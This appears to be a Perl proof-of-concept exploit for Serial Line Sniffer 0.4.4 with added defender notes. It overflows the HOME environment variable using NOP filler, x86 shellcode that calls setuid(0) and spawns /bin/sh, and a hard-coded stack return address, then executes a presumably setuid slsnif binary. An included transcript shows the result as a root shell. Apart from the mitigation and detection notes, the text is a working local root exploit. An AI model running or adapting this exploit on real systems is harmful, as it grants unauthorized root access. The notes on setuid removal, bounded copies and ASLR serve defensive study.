# Author: Sintigan[at]shellcoders.com
# http://www.shellcoders.com/
# ----------------------------------------
# Program ID: Serial Line Sniffer 0.4.4
#
# sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl
# sh-3.00# id
# uid=0(root) gid=100(users) groups=100(users)
# ---------------------------------------
#
# Greetz to Elohimus, Melkor, Modzilla, tgo, asTHma, and bk
# and whoever else i forgot
#
# Summary: proof-of-concept that places an oversized value in the HOME
# environment variable and then executes /usr/local/bin/slsnif.
#
# Notes for defenders:
#  - The transcript above (uid=0 with an unchanged gid=100) suggests slsnif
#    was installed setuid root on the author's host; this is inferred, not
#    shown. Without the setuid bit an overflow here would gain no privilege,
#    so granting serial-device access via group membership removes the impact.
#  - The slsnif code that consumes HOME is not on this page. Presumably it
#    copies getenv("HOME") into a fixed-size stack buffer without a length
#    check -- confirm against the slsnif source; the fix is a bounded copy.
#  - The payload relies on one hard-coded address and on the code being
#    executed from the environment/stack region. ASLR and a non-executable
#    stack invalidate both assumptions as written.
#  - Detection: a HOME value far longer than any real path and containing
#    non-printable bytes at exec time of a privileged binary. The payload
#    bytes include the ASCII fragments "//bi" and "n/sh".
#  - NOTE(review): no `use strict` / `use warnings`; every variable below is
#    an undeclared package global.
#
#!/usr/bin/perl

# 30 bytes of raw x86 machine code. Per the transcript above, the observed
# result is a shell running with uid=0.
$shellcode = "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

# Total length, in bytes, of the HOME value assembled below.
$buf = 288;
# Hard-coded base address; the value lies in the range classically used for
# the 32-bit Linux user stack (NOTE(review): host-specific, see header).
$ret = 0xbffff3a0;
# Single-byte filler (x86 NOP opcode).
$nop = "\x90";
# Default adjustment added to $ret; replaced by the sole command-line
# argument when exactly one is given. The argument is used unvalidated.
$offset = -250;
if (@ARGV == 1) {
    $offset = $ARGV[0];
}

# Filler section: $buf - length($shellcode) - 100 bytes, i.e. 158 bytes with
# the values above. $i is deliberately left at that count for the loop below.
for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

# Payload follows the filler.
$buffer .= $shellcode;

# 'l' packs a signed 32-bit value in native byte order, giving 4 bytes.
$addr = pack('l', ($ret + $offset));

# Resume counting from the filler length plus the payload length (188) and
# append the 4-byte address until $buf is reached: 25 copies, 100 bytes.
for ($i += length($shellcode); $i < $buf; $i += 4) {
    $buffer .= $addr;
}

# The 288-byte buffer becomes HOME; exec replaces this Perl process with
# slsnif, which inherits the modified environment.
$ENV{'HOME'} = $buffer;
exec("/usr/local/bin/slsnif");